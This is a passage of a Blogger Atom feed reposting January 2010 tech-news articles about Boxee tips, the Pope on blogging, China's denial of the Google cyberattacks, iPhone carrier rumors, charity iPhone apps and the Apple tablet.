problem is that for content like “It’s Always Sunny in Philadelphia,” you’re going to see an option to watch on FXNetwork.com, but not Hulu, because you need to be of a certain age to watch that programming, and that requires logging in with your Hulu account.&lt;br /&gt;In the Boxee Forums, NomadDNA has a great how-to post that shows you an easy trick to use your Firefox cookie settings (just be sure to login to Hulu in Firefox first) in Boxee to trick Hulu into seeing you as a logged in user!&lt;br /&gt;&lt;hr /&gt;&lt;h2&gt;Change-up Your Background&lt;/h2&gt;&lt;hr /&gt;The new Boxee Beta has a really great look, but who doesn’t love to customize their media center even more? You can change the background in Boxee by going to Settings, General and then selecting the Background Image option. Here you can point Boxee to a folder of your choosing and Boxee will rotate through the photos in that folder for your background.&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="" height="373" src="http://mashable.com/wp-content/uploads/2010/01/boxee-background.jpg" title="boxee-background" width="640" /&gt;&lt;br /&gt;&lt;/div&gt;Courtesy of Boxee Forum user ganar is this Flickr gallery of bokeh-styled images that can be used with Boxee.&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="" height="372" src="http://mashable.com/wp-content/uploads/2010/01/boxee-custom.jpg" title="boxee-custom" width="640" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;h2&gt;Your Tips&lt;/h2&gt;&lt;hr /&gt;Have you used the Boxee Beta? What are some tips and tricks you can offer for getting the most out of the experience? Let us know!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-3064751653537346014?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/3064751653537346014/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-get-most-out-of-boxee-beta.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/3064751653537346014'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/3064751653537346014'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-get-most-out-of-boxee-beta.html' title='HOW TO: Get the Most Out of the Boxee Beta'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-3086170481560076705</id><published>2010-01-26T08:33:00.001-08:00</published><updated>2010-01-26T08:33:28.902-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Pope’s Message to Priests: We Must Blog'/><title type='text'>Pope’s Message to Priests: We Must Blog</title><content type='html'>&lt;img src="http://cdn.mashable.com/wp-content/uploads/2009/05/pope-facebook.gif" /&gt;Pope Benedict XVI has a message for priests of the Catholic Church: they must proclaim the gospel by not only having a website, but by blogging and utilizing new web communication tools.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;The 265th Pope of the Catholic Church has been an unexpectedly strong proponent of social media.  Last year, he launched a YouTube channel, and six months ago, he released Facebook and iPhone apps to spread the Church’s message.  It looks like that he hopes Catholic priests will follow his digital example.&lt;br /&gt;In his message, the Pope acknowledges that priests face new challenges due to cultural shifts that have brought the conversation online. Thus, priests must do more than just take the Word of the gospel to the web.&lt;br /&gt;Here’s a small excerpt from the entire message from the Pope:&lt;br /&gt;&lt;blockquote&gt; “The spread of multimedia communications and its rich “menu of options” might make us think it sufficient simply to be present on the Web, or to see it only as a space to be filled. Yet priests can rightly be expected to be present in the world of digital communications as faithful witnesses to the Gospel, exercising their proper role as leaders of communities which increasingly express themselves with the different “voices” provided by the digital marketplace. Priests are thus challenged to proclaim the Gospel by employing the latest generation of audiovisual resources (images, videos, animated features, blogs, websites) which, alongside traditional means, can open up broad new vistas for dialogue, evangelization and catechesis.”&lt;br /&gt;&lt;/blockquote&gt;We have to give the Pope high marks for his push to make the Church more effective in the digital realm. While the Pope is not on Twitter, his Pope2you initiative is definitely a step in the right direction. He clearly knows that reaching young believers requires going to the places where they spend their time and converse. More and more, that is social media.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-3086170481560076705?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/3086170481560076705/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/popes-message-to-priests-we-must-blog.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/3086170481560076705'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/3086170481560076705'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/popes-message-to-priests-we-must-blog.html' title='Pope’s Message to Priests: We Must Blog'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-1629187041159751514</id><published>2010-01-26T08:32:00.000-08:00</published><updated>2010-01-26T08:32:16.036-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Chinese Government Denies Involvement in Google Cyberattacks'/><title type='text'>Chinese Government Denies Involvement in Google Cyberattacks</title><content type='html'>&lt;img src="http://cdn.mashable.com/wp-content/uploads/2010/01/google-china.jpg" /&gt;The Chinese government has officially denied any involvement in the sophisticated cyberattacks that breached Google’s security. The statements come 11 days after Google threatened to pull out of China unless it’s allowed to run its search engine uncensored.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;The statement, aired during two interviews on the Chinese state’s news agency, came out strong against accusations that China itself had involvement in the attacks against Google and the Gmail accounts of Chinese human rights activists.&lt;br /&gt;Here’s what a spokesman for the Ministry of Industry and Information Technology said:&lt;br /&gt;&lt;blockquote&gt; “Accusation that the Chinese government participated in (any) cyberattack, either in an explicit or inexplicit way, is groundless and aims to denigrate China.”&lt;br /&gt;&lt;/blockquote&gt;The spokesperson also stated that “China’s policy on Internet safety is transparent and consistent.” This was followed by a second interview with a spokesperson from China’s State Council (the equivalent of the U.S. Cabinet), saying that the government’s regulation of the Internet is legitimate and should be free of external influences. Most likely, this refers to recent U.S. statements calling for China to “conduct a thorough review of the cyber intrusions” of the Google attacks.&lt;br /&gt;It’s no surprise that the government would deny involvement, although it has taken over a week for China to come out and say it. Regardless of today’s new developments though, the pressure on China by both Google and the U.S. government isn’t going to go away anytime soon.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-1629187041159751514?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/1629187041159751514/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/chinese-government-denies-involvement.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/1629187041159751514'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/1629187041159751514'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/chinese-government-denies-involvement.html' title='Chinese Government Denies Involvement in Google Cyberattacks'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-7412560464514326009</id><published>2010-01-26T08:31:00.001-08:00</published><updated>2010-01-26T08:31:33.450-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='iPhone May'/><title type='text'>iPhone May Leave AT&amp;T Exclusivity Wednesday [Rumor]</title><content type='html'>&lt;img alt="" height="187" src="http://cdn.mashable.com/wp-content/uploads/2010/01/iphone-good-260.jpg" title="iphone-good-260" width="260" /&gt;It’s almost inevitable that AT&amp;amp;T will lose its iPhone exclusivity sooner or later. According to Hot Hardware, that milestone could come as early as next Wednesday at Apple’s special event.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;It makes sense for Apple: analysts say iPhone sales could as much as double as a result of pursuing broader carrier distribution. Plus, it would help assuage the Justice Department, who have indicated concern over iPhone exclusivity with AT&amp;amp;T.&lt;br /&gt;It even makes sense for AT&amp;amp;T, who in some ways are arguably shouldering an excessive burden by being the sole carrier of the data-intensive device. Many of the customer complaints about AT&amp;amp;T’s service (or lack thereof) can be traced to network troubles that are primarily a result of the bandwidth-hungry Apple phone.&lt;br /&gt;So now rumour has it that at least one of the other 3 U.S. carriers may add the iPhone to its roster next week. The inside sources that conveyed the news didn’t disclose any details about which carrier that might be, but earlier rumours point to Verizon as a likely candidate.&lt;br /&gt;If you’ve been holding out on buying an iPhone until it left the AT&amp;amp;T fold, would you consider picking one up on another carrier? If so, which carrier would it have to be? Current iPhone owners: would you consider switching carriers? Or are you content with the iPhone on AT&amp;amp;T?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-7412560464514326009?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/7412560464514326009/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/iphone-may-leave-at-exclusivity.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/7412560464514326009'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/7412560464514326009'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/iphone-may-leave-at-exclusivity.html' title='iPhone May Leave AT&amp;T Exclusivity Wednesday [Rumor]'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-466586426624221507</id><published>2010-01-26T08:30:00.000-08:00</published><updated>2010-01-26T08:30:32.671-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='3 Free iPhone Apps to Help Make a Difference'/><title type='text'>3 Free iPhone Apps to Help Make a Difference</title><content type='html'>&lt;img alt="rss image" src="http://cdn.mashable.com/wp-content/uploads/2010/01/iphone-plant.jpg" /&gt;If you’re waiting on a bus, getting coffee, or taking a quick break from work, instead of playing your favorite game, why not use an iPhone app that can help you do some good?&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;These three apps allow you to get involved in everything from finding missing persons in Haiti, to providing meals for the hungry, to helping African refugees.&lt;br /&gt;The best part is, these apps are all free.  All you need to give is a bit of your time.  So what are you waiting for?&lt;br /&gt;&lt;hr /&gt;&lt;h2&gt;1. CauseWorld&lt;br /&gt;&lt;hr /&gt;&lt;/h2&gt;&lt;center&gt;&lt;img src="http://cdn.mashable.com/wp-content/uploads/2010/01/CauseWorld.jpg" /&gt;&lt;/center&gt;Similar to Foursquare, this app allows you to virtually “check in” to locations around you. They key difference is that these check-ins actually accomplish something — earning you karma points you can redeem for donations to charities.&lt;br /&gt;This app has been out for less than a month and already almost 400,000 pounds of carbon have been offset, 54,000 meals have been provided to needy families, 9,500 trees have been planted, and 4,200 books have been donated to kids. The app is currently sponsored by Kraft Foods and Citibank and offers 10 ways to donate your karma points. Most recently they added the ability to donate to the Red Cross for relief in Haiti, and CauseWorld is doubling all of those donations.&lt;br /&gt;&lt;hr /&gt;&lt;h2&gt;2. The Extraordinaries&lt;br /&gt;&lt;hr /&gt;&lt;/h2&gt;&lt;center&gt;&lt;img src="http://cdn.mashable.com/wp-content/uploads/2010/01/Extra.jpg" /&gt;&lt;/center&gt;The Extraordinaries app allows you to perform micro-tasks for nonprofits and organizations you care about. Over 15,000 have been completed so far. For example, you can help find missing persons in Haiti, map kids’ playspaces for Kaboom, or tag images for Greenpeace. Bonus points to the Extraordinaries team for choosing a design and wording that makes me feel like a superhero. These aren’t just tasks but “missions.” You aren’t just helping out, you’re “extraordinary.” And the default user image comes with a cape — sign me up!&lt;br /&gt;&lt;hr /&gt;&lt;h2&gt;3. Give Work&lt;br /&gt;&lt;hr /&gt;&lt;/h2&gt;&lt;center&gt;&lt;img src="http://cdn.mashable.com/wp-content/uploads/2010/01/GiveWork.jpg" /&gt;&lt;/center&gt;This app lives by that cliche about teaching a man to fish instead of giving him dinner. The Give Work app supports refugees in Dadaab, Kenya, the world’s largest refugee site. You perform one task on your iPhone, and a refugee does the same in Kenya. Then the refugee gets paid for both tasks (or the money goes towards training). It’s a novel way to think about helping the poor and definitely worth a few minutes of your time.&lt;br /&gt;&lt;hr /&gt;&lt;h3&gt;More social good resources from Mashable:&lt;/h3&gt;&lt;hr /&gt;&lt;blockquote&gt;- How Social Media Creates Offline Social Good&lt;br /&gt;- How Non-Profits and Activists Can Leverage Location Based Services&lt;br /&gt;- 4 Social Good Trends of 2009&lt;br /&gt;- Why Social Media Is Vital to Corporate Social Responsibility&lt;br /&gt;- 5 Essential Tips for Promoting Your Charity Using Social Media&lt;br /&gt;- 20 Ways to Change the World in Only 15 Minutes a Day&lt;br /&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-466586426624221507?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/466586426624221507/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/3-free-iphone-apps-to-help-make.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/466586426624221507'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/466586426624221507'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/3-free-iphone-apps-to-help-make.html' title='3 Free iPhone Apps to Help Make a Difference'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-228029029900589012</id><published>2010-01-26T08:29:00.000-08:00</published><updated>2010-01-26T08:29:10.231-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='New Apple Tablet Evidence Surfaces: Around 50 Test Devices Identified'/><title type='text'>New Apple Tablet Evidence Surfaces: Around 50 Test Devices Identified</title><content type='html'>&lt;img src="http://cdn.mashable.com/wp-content/uploads/2010/01/apple-ipad-concept-260.jpg" /&gt;A new report by mobile analytics firm &lt;a href="http://www.flurry.com/" target="_blank"&gt;Flurry&lt;/a&gt; concludes that the Apple Tablet indeed exists, that about 50 test units are housed at Apple’s headquarters, and that it is primarily a media machine for gaming.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;Flurry’s analytics platform, because it’s run on thousands of different applications worldwide, is able to measure data such as OS, location, and engagement. In its data, Flurry has discerned that a group of about 50 devices are running the yet-unreleased iPhone OS 3.2 software, all of which have been geographically pinpointed to be located on Apple’s main Cupertino, CA campus.&lt;br /&gt;Flurry concludes that these devices are most likely the fabled &lt;a href="http://mashable.com/2010/01/21/what-the-apple-tablet-looks-like/" target="_blank"&gt;Apple Tablets&lt;/a&gt; that we expect to be announced on January 27th, though the company traces testing on these devices back to “as early as October of last year.” App usage has increased dramatically this month, consistent with what we’d expect for an Apple-built tablet.&lt;br /&gt;Approximately 200 of the apps that Flurry tracks were downloaded onto these mystery devices. Approximately 75% of the apps downloaded, ~150, fall into the gaming category, with entertainment, books, and lifestyle apps being the next most popular. Here’s a graph depicting the downloads:&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;img src="http://cdn.mashable.com/wp-content/uploads/2010/01/tablet-flurry-graph.jpg" /&gt;&lt;/center&gt;While this is no confirmation of the unicorn-like tablet, it is some of the strongest evidence we’ve seen yet. We’d expect that any copies of the device would be placed under secure lock-and-key at Apple’s HQ and that it would be able to run iPhone apps.&lt;br /&gt;One interesting observation: this device seems to run the iPhone 3.2 software, rather than the &lt;a href="http://mashable.com/2010/01/18/iphone-40/" target="_blank"&gt;iPhone 4.0 OS&lt;/a&gt; that is rumored to be unveiled this week. Could that mean that the device Flurry has identified isn’t the tablet, or that iPhone 4.0 won’t be ready for release for several more months? We’ll find out on Wednesday.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-228029029900589012?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/228029029900589012/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/new-apple-tablet-evidence-surfaces.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/228029029900589012'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/228029029900589012'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/new-apple-tablet-evidence-surfaces.html' title='New Apple Tablet Evidence Surfaces: Around 50 Test Devices Identified'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry></feed>